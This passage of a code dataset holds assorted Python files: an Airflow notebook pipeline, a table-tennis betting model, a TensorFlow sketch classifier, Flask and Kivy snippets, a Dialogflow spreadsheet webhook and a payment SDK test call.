ones, and initialize our screen contour\n_, contours, hierarchy = cv2.findContours(canny.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\nprint((\"Number of Contours found = \" + str(len(contours))))\n\n\n# In[10]:\n\n\n# Draw all contours\n# Use '-1' as the 3rd parameter to draw all countours\ncv2.drawContours(image, contours, -1, (0,255,0), 3)\n\n#cv2.imshow('Contours', image)\n#cv2.waitKey(0)\n#cv2.destroyAllWindows()\n\nio.imshow(image)\nio.show()\n\n","sub_path":"Image_Segmentation(contours)_Circle_Line_Blob_Detection.py","file_name":"Image_Segmentation(contours)_Circle_Line_Blob_Detection.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"175072370","text":"# from airflow.contrib.hooks.fs_hook import FSHook\n#\n# from airflow.contrib.sensors.file_sensor import FileSensor\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.trigger_dagrun import TriggerDagRunOperator\n\n#file place in /data/ds_env/..../packages-site/\nfrom omega_plugin_file import OmegaFileSensor, ArchiveFileOperator\n\n#installed using pip (check pip freez)\nfrom airflow.providers.papermill.operators.papermill import PapermillOperator\n\nimport datetime\nfrom datetime import date, timedelta\nimport airflow\n\nfrom airflow.operators.bash import BashOperator\nfrom airflow.utils.dates import days_ago\n\nfrom textwrap import dedent\n\n\ndefault_args = {\n \"depends_on_past\" : False,\n \"start_date\" : airflow.utils.dates.days_ago( 1 ),\n \"retries\" : 1,\n \"retry_delay\" : datetime.timedelta( hours= 5 ),\n}\n\n\nuser = 'ys'\n\n\nwith airflow.DAG( \"A_ETL\", default_args= default_args, schedule_interval= \"@once\" ) as dag:\n start_task = DummyOperator( task_id= \"start\" )\n stop_task = DummyOperator( task_id= \"stop\" )\n \n Libraries_Installation = BashOperator(\n task_id='Libraries_Installation',\n bash_command=f'jupyter nbconvert --execute --clear-output /home/{user}/notebook/Libraries_Installation.ipynb',\n )\n \n DS_Cleaning = BashOperator(\n task_id='DS_Cleaning',\n bash_command=f'jupyter nbconvert --execute --clear-output /home/{user}/notebook/DS_Cleaning.ipynb',\n )\n \n DSE_Cleaning = BashOperator(\n task_id='DSE_Cleaning',\n bash_command=f'jupyter nbconvert --execute --clear-output /home/{user}/notebook/DSE_Cleaning.ipynb',\n )\n \n Prof_Cleaning = BashOperator(\n task_id='Prof_Cleaning',\n bash_command=f'jupyter nbconvert --execute --clear-output /home/{user}/notebook/Prof_Cleaning.ipynb',\n ) \n \n DS_Insertion_to_DB = BashOperator(\n task_id='DS_Insertion_to_DB',\n bash_command=f'jupyter nbconvert --execute --clear-output /home/{user}/notebook/DS_Insertion_to_DB.ipynb',\n )\n \n \n DSE_Insertion_to_DB = BashOperator(\n task_id='DSE_Insertion_to_DB',\n bash_command=f'jupyter nbconvert --execute --clear-output /home/{user}/notebook/DSE_Insertion_to_DB.ipynb',\n )\n \n \n \n Prof_Insertion_to_DB = BashOperator(\n task_id='Prof_Insertion_to_DB',\n bash_command=f'jupyter nbconvert --execute --clear-output /home/{user}/notebook/Prof_Insertion_to_DB.ipynb',\n )\n \n \n \n Loggin_Data_Cleaning = BashOperator(\n task_id='Loggin_Data_Cleaning',\n bash_command=f'jupyter nbconvert --execute --clear-output /home/{user}/notebook/Loggin_Data_Cleaning.ipynb',\n )\n \n Logging_Data_Insertion_to_DB = BashOperator(\n task_id='Logging_Data_Insertion_to_DB',\n bash_command=f'jupyter nbconvert --execute --clear-output /home/{user}/notebook/Logging_Data_Insertion_to_DB.ipynb',\n )\n \n \n Statistics_Output = BashOperator(\n task_id='Statistics_Output',\n bash_command=f'jupyter nbconvert --execute --clear-output /home/{user}/notebook/Statistics_Output.ipynb',\n )\n\n trigger_again = TriggerDagRunOperator(\n task_id='trigger_dag_again', \n trigger_dag_id=\"A_ETL\", \n dag=dag\n )\n \nstart_task >> Libraries_Installation >> DS_Cleaning >> DSE_Cleaning >> Prof_Cleaning >> DS_Insertion_to_DB >> DSE_Insertion_to_DB >> Prof_Insertion_to_DB >> Loggin_Data_Cleaning >> Logging_Data_Insertion_to_DB >> Statistics_Output >> stop_task >> trigger_again","sub_path":"dag1.py","file_name":"dag1.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"489826496","text":"from Storages import *\nfrom BetsStorage import *\nfrom Entity import *\nfrom common import *\n\n\nclass TTModel:\n def __init__(self, dirname):\n\n self.playersDict = GlobalPlayersDict(mode='filtered', dirname=dirname + '/')\n\n self.rankingSources = []\n self.rankingSources.append(['ttfr', dirname + '/prepared_data/propingpong/ranking_rus.txt'])\n self.rankingSources.append(['ittf', dirname + '/prepared_data/propingpong/ranking_ittf.txt'])\n #self.rankingSources.append(['my', dirname + '/prepared_data/rankings/all_rankings_mw_fresh_sets_1.txt'])\n\n for ws in [730]:\n for matchesCntBorder in [4]:\n # for ws in [365, 730]:\n # for matchesCntBorder in [1, 4]:\n self.rankingSources.append(['ranking_my_' + str(ws) + '_' + str(matchesCntBorder),\n ['prepared_data/rankings/rankings_m_sets_sources=0_ws=' + str(\n ws) + '_matchesCntBorder=' + str(matchesCntBorder) + '.txt',\n 'prepared_data/rankings/rankings_w_sets_sources=0_ws=' + str(\n ws) + '_matchesCntBorder=' + str(matchesCntBorder) + '.txt']])\n\n self.rankingSources.append(['liga_pro', dirname + '/prepared_data/liga_pro/ranking_liga_pro.txt'])\n\n self.rankingsStorage = RankingsStorage(self.rankingSources)\n\n for ws in [730]:\n for matchesCntBorder in [4]:\n rName = 'my_' + str(ws) + '_' + str(matchesCntBorder)\n self.rankingsStorage.readPlayersDayRankings('ranking_' + rName + '_day', 'test/dayRankings_m_' + rName + '.txt')\n self.rankingsStorage.readPlayersDayRankings('ranking_' + rName + '_day', 'test/dayRankings_w_' + rName + '.txt')\n\n\n self.players = dict()\n #self.playersDict = dict()\n for k, v in sorted(self.playersDict.id2names.items(), key=lambda x: x[0]):\n #self.playersDict[k] = len(self.players)\n self.players[k] = Player(k, v, k[0])\n\n with open(dirname + '/prepared_data/liga_pro/players_liga_pro.txt', encoding='utf-8') as fin:\n for line in fin:\n tokens = line.strip().split('\\t')\n self.players[tokens[0]].addHref('liga_pro', tokens[2])\n\n sources = list()\n sources.append(['master_tour', dirname + '/prepared_data/master_tour/all_results.txt'])\n sources.append(['liga_pro', dirname + '/prepared_data/liga_pro/all_results.txt'])\n sources.append(['challenger_series', dirname + '/prepared_data/challenger_series/all_results.txt'])\n sources.append(['bkfon', dirname + '/prepared_data/bkfon/all_results.txt'])\n sources.append(['local', dirname + '/prepared_data/local/kchr_results.txt'])\n sources.append(['ittf', dirname + '/prepared_data/ittf/all_results.txt'])\n sources.append(['rttf', dirname + '/prepared_data/rttf/all_results.txt'])\n\n self.matchesStorage = MatchesStorage(sources)\n self.sortMatches()\n\n self.competitionsStorage = CompetitionsStorage()\n for match in self.matches:\n compId = self.competitionsStorage.getCompId(match.compName)\n match.setCompId(compId)\n self.competitionsStorage.getComp(compId).addMatch(match)\n\n for match in self.matches:\n for i in range(2):\n for e in match.ids[i]:\n if e not in {'-', '?'}:\n self.players[e].matches.append(match)\n\n self.betsStorage = BetsStorage()\n self.betsStorage.loadFromFile(dirname + '/prepared_data/bkfon/live/tail.txt')\n # self.betsStorage.loadFromFile(dirname + '/prepared_data/bkfon/live/all_bets_prepared.txt')\n# self.matchesBetsStorage = MatchesBetsStorage(self.hash2matchInd,filename=)\n\n# self.bets = self.betsStorage.bets\n\n self.lastUpdateTime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')[:10] + ' 00:00:00'\n self.lastUpdateTime = '2017-06-12 13:53:00'\n\n self.n = len(self.matches)\n '''\n with open(r'D:\\Programming\\SportPrognoseSystem\\TTStat\\test\\model_3.pkl', 'rb') as fin:\n self.model = pickle.load(fin)\n '''\n\n self.predictionMachine = None\n\n def setPredictionMachine(self, predictionMachine):\n self.predictionMachine = predictionMachine\n self.predictionMachine.setRankingsStorage(self.rankingsStorage)\n self.predictionMachine.setMatchesStorage(self.matchesStorage)\n\n def sortMatches(self):\n self.matchesStorage.matches = list(sorted(self.matchesStorage.matches,\n key=lambda x: x.date + ', ' + (x.time if x.time else '-'), reverse=1))\n self.matches = self.matchesStorage.matches\n self.matchesStorage.buildHash2MatchInd()\n self.hash2matchInd = self.matchesStorage.hash2matchInd\n\n def addMatch(self, source, match):\n if match.compName.find('TT-CUP') != -1:\n return\n # print('models.addMatch', match.hash)\n isNew = self.matchesStorage.addMatch(source, match)\n if isNew is True:\n for i in range(2):\n for e in match.ids[i]:\n if e in self.players:\n self.players[e].matches.append(match)\n self.players[e].matches = list(sorted(self.players[e].matches,\n key=lambda x: x.date + ', ' + (x.time if x.time else '-'), reverse=1))\n\n self.rankingsStorage.addMatch(source, match)\n\n def update(self, rows):\n lastTime = None\n block = []\n rowNames = dict(zip(['id', 'datetime', 'eventId', 'compName', 'info'], range(5)))\n isFinished = False\n for row in rows:\n row = [str(e) for e in row]\n # print(row)\n curTime = str(row[1])\n if lastTime is not None and curTime != lastTime:\n finished = self.betsStorage.update(block)\n for finishedMatch in finished:\n print('FINISHED')\n print(finishedMatch.toStr())\n self.addMatch('bkfon_live', finishedMatch)\n isFinished = True\n block = []\n tokens = row[rowNames['info']].split('\\t')\n dt = row[rowNames['datetime']]\n eventsInfo = json.loads(tokens[2])\n # Старый формат в базе\n if len(eventsInfo) > 1:\n eventsInfo = [eventsInfo]\n names = [tokens[0].split(';'), tokens[1].split(';')]\n extraInfo = dict()\n score = eventsInfo[0][1]['match']['score']\n if names[0][0].startswith('Game'):\n try:\n names = [e.strip().split('\\\\') for e in score.split(')')[1].split('-')]\n assert len(names) == 2\n extraInfo['teams'] = [tokens[0].replace('Game', '').strip()[1:].strip().split(';'), tokens[1].strip().split(';')]\n extraInfo['game'] = tokens[0].replace('Game', '').strip()[0]\n except:\n names = [tokens[0].split(';'), tokens[1].split(';')]\n print('ERROR_SCORE', eventsInfo)\n else:\n try:\n extraInfo['round'] = score.split(')')[1].strip()\n if extraInfo['round'] == '':\n extraInfo.pop('round')\n except:\n pass\n ids = self.getMatchPlayersIds(names, compName=row[rowNames['compName']], date=dt[:10])\n block.append(MatchBet(row[rowNames['eventId']], dt, row[rowNames['compName']],\n ids, eventsInfo, names=names, extraInfo=extraInfo))\n self.lastUpdateTime = max(self.lastUpdateTime, curTime)\n lastTime = curTime\n if lastTime is not None:\n finished = self.betsStorage.update(block)\n for finishedMatch in finished:\n print('FINISHED')\n print(finishedMatch.toStr())\n self.addMatch('bkfon_live', finishedMatch)\n isFinished = True\n\n if isFinished is True:\n self.sortMatches()\n\n print(self.lastUpdateTime)\n\n def getPlayerNames(self, playerId):\n return self.playersDict.getNames(playerId)\n\n def getPlayerName(self, playerId):\n return self.playersDict.getName(playerId)\n\n def getMatchPlayersNames(self, ids):\n return [self.playersDict.getName(id) for id in ids]\n\n def getMatchPlayersIds(self, players, compName=None, date=None):\n # for i in range(2):\n # for playerName in players[i]:\n # playerIds = self.playersDict.getId(playerName)\n\n ids = [[], []]\n for i in range(2):\n for player in players[i]:\n player = ' '.join(player.split()).strip()\n playerId = self.playersDict.getId(player)\n if len(playerId) == 1:\n pass\n elif len(playerId) > 1:\n if compName is not None and date is not None:\n idGood = []\n source = 'bkfon'\n if compName.find('Мастер-Тур') != -1:\n source = 'master_tour'\n elif compName.find('Лига Про') != -1:\n source = 'liga_pro'\n\n for e in playerId:\n if self.matchesStorage.isActive(e, source, date):\n idGood.append(e)\n if len(idGood) == 1:\n playerId = idGood\n ids[i].append(','.join(playerId))\n\n return ids\n\n def getMatch(self, matchId):\n if matchId in self.hash2matchInd:\n return self.matches[self.hash2matchInd[matchId]]\n elif matchId in self.betsStorage.bets:\n return self.betsStorage.bets[matchId].getMatch()\n return None\n\n def getLiveBet(self, matchId):\n return self.betsStorage.getBet(matchId)\n return None\n\n def getFeatures(self, matchBet, dt):\n mb = dict()\n if matchBet is None:\n return dict()\n if len(matchBet.eventsInfo) != 0:\n mb = matchBet.eventsInfo[0][1].get('match', dict())\n allFeatures = \\\n self.predictionMachine.getFeatures(\n matchBet.getMatch(),\n dt,\n score=None,\n betInfo=mb\n )\n return allFeatures\n\n def predict(self, matchBet, dt, score=None, betInfo=None):\n pWin = \\\n self.predictionMachine.predict(\n matchBet.getMatch(),\n dt,\n score=score,\n betInfo=betInfo\n )\n return pWin\n\n def getRankings(self, playerId, curDate, ws=1):\n return self.rankingsStorage.getRankings(playerId, curDate, ws=ws)\n\n def makePrediction(self, playerId1, playerId2):\n # r1 = self.getFeatures(playerId1, datetime.datetime.now().strftime(\"%Y-%m-%d\"))\n # r2 = self.getFeatures(playerId2, datetime.datetime.now().strftime(\"%Y-%m-%d\"))\n # r1 = [float(e) for e in [r1['liga_pro'], r1['my']]]\n # r2 = [float(e) for e in [r2['liga_pro'], r2['my']]]\n # ff = [[r1[0] - r2[0], r1[1] - r2[1]]]\n # if r1[0] == -1 or r2[0] == -1:\n # ff[0][0] = 0\n # if r1[1] == -1 or r2[1] == -1:\n # ff[0][1] = 0\n # print(ff)\n # self.model = linear_model.LogisticRegression(fit_intercept=False)\n # self.model.coef_ = np.array([[ 0.00957611, 0.10476427]])\n # self.model.intercept_ = 0\n # '''\n # df1 = pd.DataFrame(index=[0], data=ff, columns=['drus', 'dittf', 'dmy'])\n # df2 = -df1\n # '''\n # print(self.model.predict_proba(ff))\n # p1 = self.model.predict_proba(ff)[0, 1]\n # p2 = p1\n # #p2 = self.model.predict_proba(-ff)[0, 0]\n # print([p1, p2])\n # print(r1)\n # print(r2)\n # if ff[0] != 0 or ff[1] != 0:\n # return format((p1 + p2) / 2 * 100, '.1f') + '%,
    ' + 'ставка на игрока 1 от кф ' + format(1 / p1, '.2f') + ';
    ' + 'ставка на игрока 2 от кф ' + format(1 / (1 - p1), '.2f') + ';'\n return '?'\n","sub_path":"ttstat/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"499004763","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport numpy as np\nimport os\nimport argparse\nimport ast\nimport functools\nimport sys\nimport tensorflow as tf\n\n\ndef my_model_fn(features,labels,mode,params):\n def create_input_model(features,labels):\n shapes=features[\"shape\"]\n ink1=features[\"ink\"]\n length_of_tensors = tf.squeeze(tf.slice(shapes,begin=[0,0],size = [params.batch_size,1]))\n inks=tf.reshape(ink1,[params.batch_size,-1,3])\n if labels is not None:\n labels=tf.squeeze(labels)\n return inks,labels,length_of_tensors\n \n def main_path(inks,lengths):\n #First,get into convolution layer:\n conv=inks\n train = tf.estimator.ModeKeys.TRAIN\n for i in range(len(params.num_conv)):\n convolved_input=conv\n if params.batch_norm:\n conv = tf.layers.batch_normalization(\n conv,training=(mode==train))\n if i > 0 and params.dropout:\n convolved_input = tf.layers.dropout(\n convolved_input,\n rate = params.dropout,\n training=(mode == train)\n )\n convolved = tf.layers.conv1d(\n convolved_input,\n filters=params.num_conv[i],\n kernel_size=params.conv_len[i],\n activation=None,\n strides=1,\n padding=\"same\",\n name=\"conv1d_%d\" % i)\n \n #Second, we make use of a RNN model, continue using the result from CNN\n convolved = tf.transpose(convolved, [1, 0, 2])\n lstm = tf.contrib.cudnn_rnn.CudnnLSTM(\n num_layers=params.num_layers,\n num_units=params.num_nodes,\n dropout=params.dropout if mode == tf.estimator.ModeKeys.TRAIN else 0.0,\n direction=\"bidirectional\")\n outputs, _ = lstm(convolved)\n outputs = tf.transpose(outputs, [1, 0, 2])\n mask = tf.tile(\n tf.expand_dims(tf.sequence_mask(lengths,tf.shape(outputs)[1]),2),\n [1,1,tf.shape(outputs)[2]])\n zero_outside = tf.where(mask, outputs, tf.zeros_like(outputs))\n outputs = tf.reduce_sum(zero_outside, axis=1)\n return outputs\n \n \n inks,length,labels = create_input_model(features,labels)\n state = main_path(inks,length)\n #add a layer of fully connected layer\n logits=tf.layers.dense(state,params.num_classes)\n \n #loss_computing\n cross_entropy = tf.reduce_mean(\n tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels, logits=logits)\n )\n #optimizer\n train_op = tf.contrib.layers.optimize_loss(\n loss=cross_entropy,\n global_step=tf.train.get_global_step(),\n learning_rate=params.learning_rate,\n optimizer=\"Adam\",\n clip_gradients=params.gradient_clipping_norm,\n summaries=[\"learning_rate\", \"loss\", \"gradients\", \"gradient_norm\"])\n\n predictions = tf.argmax(logits, axis=1)\n return tf.estimator.EstimatorSpec(\n mode=mode,\n predictions={\"logits\": logits, \"predictions\": predictions},\n loss=cross_entropy,\n train_op=train_op,\n eval_metric_ops={\"accuracy\": tf.metrics.accuracy(labels, predictions)})\n \n ","sub_path":"model_fn.py","file_name":"model_fn.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"358650428","text":"import os\nimport json\nimport requests\nfrom decouple import config\nfrom flask import Flask, redirect, render_template, request, flash, sessions, url_for\n\napp = Flask(__name__)\napp.secret_key = config('SECRET_KEY')\nBASE_URL = 'http://127.0.0.1:8000'\n\n###################### HELPER ############################################################\ndef serve_endpoint(path):\n return BASE_URL + path\n\ndef send_image_req(url,data):\n my_img = {'file': open(data, 'rb')}\n response = requests.post(url, files=my_img)\n return response.json()\n\ndef send_path_req(url, path):\n param = {'rel_path': path}\n response = requests.post(url, json=param)\n return response.json()\n\n##########################################################################################\n################### MAIN ROUTING #########################################################\n############## ONLY FOR TESTING API ######################################################\n##########################################################################################\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/', methods=['POST'])\ndef upload_image():\n if request.method == 'POST':\n file = request.files.get('file')\n data = file.filename\n response = send_image_req(serve_endpoint('/api/upload'),data)\n saved = response['saved']\n recent_upload = serve_endpoint(response['recent_upload'])\n \n if saved:\n flash('Yey image successfully uploaded and predicted. Result shows below')\n return render_template('index.html', recent_upload=recent_upload)\n else: \n flash('Nothing happens so far')\n return render_template(\"index.html\")\n return render_template(\"index.html\", message=\"Your request is not reached\")\n\n@app.route('/predict', methods=['POST'])\ndef predict_img():\n if request.method == 'POST':\n recent_upload = request.form.get('recent_upload')\n base_up = os.path.basename(recent_upload)\n\n response_res = requests.get(serve_endpoint(f'/api/result/opencv/{base_up}')).json()\n response_ext = requests.get(serve_endpoint(f'/api/extract/opencv/{base_up}')).json()\n # response = {response_res, response_ext}\n return redirect(url_for('display', response_res=json.dumps(response_res), \n response_ext=json.dumps(response_ext)))\n \n@app.route('/display')\ndef display():\n messages_res = json.loads(request.args['response_res'])\n messages_ext = json.loads(request.args['response_ext'])\n result_path = serve_endpoint(messages_res['result_path'])\n extract_paths = list(map(BASE_URL.__add__, messages_ext['extract_paths']))\n \n return render_template('display.html', extract_paths=extract_paths, result_path=result_path)\n\n##########################################################################################\n##########################################################################################\n##########################################################################################\n\nif __name__ == \"__main__\":\n app.run(port=5001, debug=True)","sub_path":"apps/testAPI/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"385251722","text":"# Copyright 2021 MosaicML. All Rights Reserved.\n\nfrom dataclasses import dataclass\n\nimport yahp as hp\nfrom torchvision import transforms\nfrom torchvision.datasets import CIFAR10\n\nfrom composer.datasets.hparams import DataloaderSpec, DatasetHparams\n\n\n@dataclass\nclass CIFAR10DatasetHparams(DatasetHparams):\n \"\"\"Defines an instance of the CIFAR-10 dataset for image classification.\n \n Parameters:\n is_train (bool): Whether to load the training or validation dataset.\n datadir (str): Data directory to use.\n download (bool): Whether to download the dataset, if needed.\n drop_last (bool): Whether to drop the last samples for the last batch.\n shuffle (bool): Whether to shuffle the dataset for each epoch.\n \"\"\"\n\n is_train: bool = hp.required(\"whether to load the training or validation dataset\")\n datadir: str = hp.required(\"data directory\")\n download: bool = hp.required(\"whether to download the dataset, if needed\")\n drop_last: bool = hp.optional(\"Whether to drop the last samples for the last batch\", default=True)\n shuffle: bool = hp.optional(\"Whether to shuffle the dataset for each epoch\", default=True)\n\n def initialize_object(self) -> DataloaderSpec:\n cifar10_mean, cifar10_std = [0.4914, 0.4822, 0.4465], [0.247, 0.243, 0.261]\n datadir = self.datadir\n\n if self.is_train:\n transformation = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(mean=cifar10_mean, std=cifar10_std),\n ])\n else:\n transformation = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=cifar10_mean, std=cifar10_std),\n ])\n\n return DataloaderSpec(\n dataset=CIFAR10(\n datadir,\n train=self.is_train,\n download=self.download,\n transform=transformation,\n ),\n drop_last=self.drop_last,\n shuffle=self.shuffle,\n )\n","sub_path":"composer/datasets/cifar10.py","file_name":"cifar10.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"384869130","text":"from app import db\nfrom app.api.helpers import Service\nfrom app.models import (Supplier, Domain, SupplierDomain, Assessment)\n\n\nclass SupplierDomainService(Service):\n __model__ = SupplierDomain\n\n def __init__(self, *args, **kwargs):\n super(SupplierDomainService, self).__init__(*args, **kwargs)\n\n def get_supplier_domains(self, supplier_code):\n result = (\n db\n .session\n .query(\n SupplierDomain.id,\n SupplierDomain.status,\n Domain.name.label('service'),\n Domain.id.label('service_id'),\n Assessment.active.label('active_assessment')\n )\n .join(Supplier)\n .join(Domain)\n .outerjoin(Assessment)\n .filter(Supplier.code == supplier_code)\n .order_by(Domain.name)\n .all()\n )\n\n return [r._asdict() for r in result]\n\n def set_supplier_domain_status(self, supplier_id, domain_id, status, price_status, do_commit=True):\n existing = self.filter(\n SupplierDomain.domain_id == domain_id,\n SupplierDomain.supplier_id == supplier_id\n ).one_or_none()\n if existing:\n existing.status = status\n existing.price_status = price_status\n return self.save(existing, do_commit)\n else:\n supplier_domain = SupplierDomain(\n domain_id=domain_id,\n supplier_id=supplier_id,\n status=status,\n price_status=price_status\n )\n return self.save(supplier_domain, do_commit)\n","sub_path":"app/api/services/supplier_domain.py","file_name":"supplier_domain.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"640929488","text":"# -*- coding: utf-8 -*-\nfrom django.http import JsonResponse, HttpRequest \nfrom django.views.decorators.csrf import csrf_exempt\nimport json\nimport gspread\nimport oauth2client.client\nimport os\n\n\ndef get_request_num(request):\n \"\"\"dialogflowからのrequestから必要な件数を抽出する\"\"\"\n # requestをデコードしてその文字列をjsonの辞書型に変換\n req = json.loads(request.body.decode('utf-8'))\n \n # 何も指定がなければ直近の1件のみを返す\n line_num = 1\n # requestから'number'または'request_nums'の存在する方を取得する\n params = req['result']['parameters']\n if 'request_nums' in params.keys():\n request_nums = params['request_nums']\n if request_nums != '':\n line_num = int(request_nums)\n if 'number' in params.keys():\n number = params['number']\n if number != '':\n line_num = int(number)\n\n return line_num\n\n\ndef get_gc_client():\n \"\"\"\n GoogleSpreadSheet client を取得する\n ref: http://gspread.readthedocs.io/en/latest/#gspread.authorize\n \"\"\"\n scope = ['https://spreadsheets.google.com/feeds']\n client_email = os.environ['CLIENT_EMAIL']\n private_key = os.environ['PRIVATE_KEY'].replace('\\\\n', '\\n').encode('utf-8')\n credentials = oauth2client.client.SignedJwtAssertionCredentials(client_email, private_key, scope)\n gc = gspread.authorize(credentials)\n\n return gc\n\n\ndef get_gc_value(gc, line_num):\n \"\"\"\n GoogleSpreadSheetからデータを取得して指定の件数返す\n \"\"\"\n ss = gc.open(\"memorandum\")\n sh = ss.worksheet(\"memo1\")\n values = sh.get_all_values()\n \n # 指定された数字がシートの件数を超えていたらシートの最大件数を設定\n if int(line_num) >= len(values):\n line_num = len(values)\n\n ret_vals = ''\n for i in range(1, line_num + 1):\n # シートの最新の行から順に返す\n # 3要素目がメモの本文\n ret_vals += str(values[len(values) - i][2])\n # 次の項目の前に空白を入れる\n ret_vals += '。 '\n\n return ret_vals\n\n\n@csrf_exempt\ndef index(request):\n\n # requestから必要な件数を抽出\n line_num = get_request_num(request)\n # GoogleSpreadSheet client を取得\n gc = get_gc_client()\n # GoogleSpreadSheet から必要な件数だけデータを取得\n sheet_messages = get_gc_value(gc, line_num)\n res = {\n \"speech\": sheet_messages,\n \"displayText\": sheet_messages,\n #\"data\": {\"kik\": {}},\n #\"contextOut\": [{\"name\":\"weather\", \"lifespan\":2, \"parameters\":{\"city\":\"Rome\"}}],\n \"source\": \"spreadsheet memorandum\"\n }\n return JsonResponse(res)\n","sub_path":"memorandum/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"429985361","text":"# -*- coding: utf-8 -*-\n\nfrom nps.errors import RejectedException, DeclinedException\nfrom nps.nps_sdk import NpsSDK\nfrom suds import TypeNotFound\n\n#try:\nsdk = NpsSDK()\n\nparams = {\n \"psp_Version\": '2.2',\n \"psp_MerchantId\": 'psp_test',\n \"psp_TxSource\": 'WEB',\n \"psp_MerchTxRef\": 'OsDER61466-3',\n \"psp_MerchOrderId\": 'OsDER61466',\n \"psp_Amount\": 15050,\n \"psp_NumPayments\": 1,\n \"psp_Currency\": '032',\n \"psp_Country\": 'ARG',\n \"psp_Product\": 14,\n \"psp_CardNumber\": 4507990000000010,\n \"psp_CardExpDate\": 1612,\n \"psp_PosDateTime\": '2016-12-01 12:00:00'\n}\n\nresp = sdk.PayOnLine_2p(params)\n\nprint (resp)\n\"\"\"\nexcept DeclinedException as e:\n print (e.get_extended_message())\nexcept RejectedException as e:\n print (e.get_extended_message())\nexcept TypeNotFound as e:\n print (e.message)\n\n\"\"\"","sub_path":"casosTester.py","file_name":"casosTester.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"161228905","text":"# https://www.coursera.org/learn/python-osnovy-programmirovaniya/programming/g7wXJ/sosiedi-odnogho-znaka/submission\r\n\r\n# Возрастает ли список?\r\n\r\n# Дан список. Определите, является ли он монотонно возрастающим(то есть верно\r\n# ли, что каждый элемент этого списка больше предыдущего).Выведите YES, если\r\n# массив монотонно возрастает и NO в противном случае.Решение оформите в виде\r\n# функции IsAscending(A).В данной функции должен быть один цикл while, не\r\n# содержащий вложенных условий и циклов — используйте схему линейного поиска.\r\n\r\n\r\ndef IsAscending(list):\r\n k = 1\r\n while k < len(list) and list[k - 1] < list[k]:\r\n k += 1\r\n return len(list) == k\r\n\r\n\r\ndef PrintAnswer(truth, answers=('YES', 'NO')):\r\n if truth:\r\n print(answers[0])\r\n else:\r\n print(answers[1])\r\n\r\n\r\ndata = tuple(map(int, input().split()))\r\n\r\nPrintAnswer(IsAscending(data))\r\n","sub_path":"5/5-18.py","file_name":"5-18.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"622281048","text":"'''\r\n a simple Yes/No Popup\r\n LICENSE : MIT\r\n'''\r\nfrom kivy.uix.popup import Popup\r\nfrom kivy.properties import StringProperty\r\n\r\nfrom kivy.lang.builder import Builder\r\nBuilder.load_string('''\r\n#\r\n:\r\n FloatLayout:\r\n Label:\r\n size_hint: 0.8, 0.6\r\n pos_hint: {'x': 0.1, 'y':0.4}\r\n text: root.message\r\n\r\n Button:\r\n size_hint: 0.4, 0.35\r\n pos_hint: {'x':0.1, 'y':0.05}\r\n text: 'Yes'\r\n on_release: root.dispatch('on_yes')\r\n \r\n Button:\r\n size_hint: 0.4, 0.35\r\n pos_hint: {'x':0.5, 'y':0.05}\r\n text: 'No'\r\n on_release: root.dispatch('on_no')\r\n\r\n#\r\n''')\r\n\r\nclass YesNoPopup(Popup):\r\n __events__ = ('on_yes', 'on_no')\r\n\r\n message = StringProperty('')\r\n\r\n def __init__(self, **kwargs) -> None:\r\n super(YesNoPopup, self).__init__(**kwargs)\r\n self.auto_dismiss = False\r\n \r\n def on_yes(self):\r\n pass\r\n \r\n def on_no(self):\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n from kivy.app import App\r\n from kivy.uix.boxlayout import BoxLayout\r\n from kivy.uix.button import Button\r\n \r\n class TestApp(App):\r\n def __init__(self, **kwargs):\r\n super(TestApp, self).__init__(**kwargs)\r\n \r\n def build(self):\r\n self.pop = pop = YesNoPopup(\r\n title='Popup !',\r\n message='OK ?',\r\n size_hint=(0.4, 0.3),\r\n pos_hint={'x':0.3, 'y':0.35}\r\n )\r\n pop.bind(\r\n on_yes=self._popup_yes,\r\n on_no=self._popup_no\r\n )\r\n root = BoxLayout()\r\n btn = Button(text='open')\r\n root.add_widget(btn)\r\n btn.bind(on_release=lambda btn: self.pop.open())\r\n return root\r\n\r\n def _popup_yes(self, instance):\r\n print(f'{instance} on_yes')\r\n self.pop.dismiss()\r\n\r\n def _popup_no(self, instance):\r\n print(f'{instance} on_no')\r\n self.pop.dismiss()\r\n\r\n \r\n TestApp().run()\r\n ","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"315634501","text":"# Object: Create a function that takes two strings as arguments and return either True or False depending on whether the total 